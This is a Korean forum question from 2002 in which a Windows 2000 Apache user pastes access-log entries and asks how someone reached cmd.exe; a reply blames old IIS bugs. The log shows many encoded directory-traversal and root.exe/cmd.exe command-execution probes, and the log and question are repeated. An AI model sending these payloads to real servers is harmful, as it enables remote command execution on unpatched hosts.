묻고답하기
이 아파치 로그파일좀 봐주세요~
2002.07.05 21:29
211.237.gdfg - - [05/Jul/2002:19:38:13 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 274
211.237.dfg7 - - [05/Jul/2002:19:38:13 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 272
211.237.fdg - - [05/Jul/2002:19:38:13 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
211.237.dfg- - [05/Jul/2002:19:38:13 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
211.237.dfg- - [05/Jul/2002:19:38:13 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dg- - [05/Jul/2002:19:38:13 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
211.237.dg- - [05/Jul/2002:19:38:13 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
211.237.dfg- - [05/Jul/2002:19:38:13 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
211.237.dfg - - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dgf- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dfg- - [05/Jul/2002:19:43:49 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 274
211.237.dg- - [05/Jul/2002:19:43:49 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 272
211.237.dfg- - [05/Jul/2002:19:43:49 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
211.237.dfg- - [05/Jul/2002:19:43:49 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
211.237.dfg- - [05/Jul/2002:19:43:49 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dg- - [05/Jul/2002:19:43:49 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
211.237.dfg- - [05/Jul/2002:19:43:50 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
211.237.dfg- - [05/Jul/2002:19:43:59 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
211.237.dfg97 - - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
211.237.dg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
211.237.dg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dgfg7 - - [05/Jul/2002:19:44:02 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
제가 윈도 2k 에다 아파치 php mysql 설치하고 돌리고있습니다.
얼마전 배운거 시험좀 해볼려고 몇분에게 계정을 드렸는데..
그중에 한분의 행동이 로그파일에 이렇게 기록되어있더군요..
왠 winnt/system32 라니 ;; 어떻게 그 폴더에 접근한걸까요? ;;
글구 cmd 면 쉘프로그램아닌가?
211.237.dfg7 - - [05/Jul/2002:19:38:13 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 272
211.237.fdg - - [05/Jul/2002:19:38:13 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
211.237.dfg- - [05/Jul/2002:19:38:13 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
211.237.dfg- - [05/Jul/2002:19:38:13 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dg- - [05/Jul/2002:19:38:13 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
211.237.dg- - [05/Jul/2002:19:38:13 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
211.237.dfg- - [05/Jul/2002:19:38:13 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
211.237.dfg - - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dgf- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dfg- - [05/Jul/2002:19:43:49 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 274
211.237.dg- - [05/Jul/2002:19:43:49 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 272
211.237.dfg- - [05/Jul/2002:19:43:49 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
211.237.dfg- - [05/Jul/2002:19:43:49 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
211.237.dfg- - [05/Jul/2002:19:43:49 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dg- - [05/Jul/2002:19:43:49 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
211.237.dfg- - [05/Jul/2002:19:43:50 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
211.237.dfg- - [05/Jul/2002:19:43:59 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
211.237.dfg97 - - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
211.237.dg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
211.237.dg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dgfg7 - - [05/Jul/2002:19:44:02 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
제가 윈도 2k 에다 아파치 php mysql 설치하고 돌리고있습니다.
얼마전 배운거 시험좀 해볼려고 몇분에게 계정을 드렸는데..
그중에 한분의 행동이 로그파일에 이렇게 기록되어있더군요..
왠 winnt/system32 라니 ;; 어떻게 그 폴더에 접근한걸까요? ;;
글구 cmd 면 쉘프로그램아닌가?
IIS에는 상당한 버그가 있어서 위의 로그처럼 접근할 수 있는 버그가 예전에 있었습니다.
물론 아직도 패치를 안 하고 사용하는 win2k이라면 위의 접근이 먹히죠...
IIS와 관련된 것이니 아파치에서는 크게 신경쓰지 않아도 될 것 같습니다.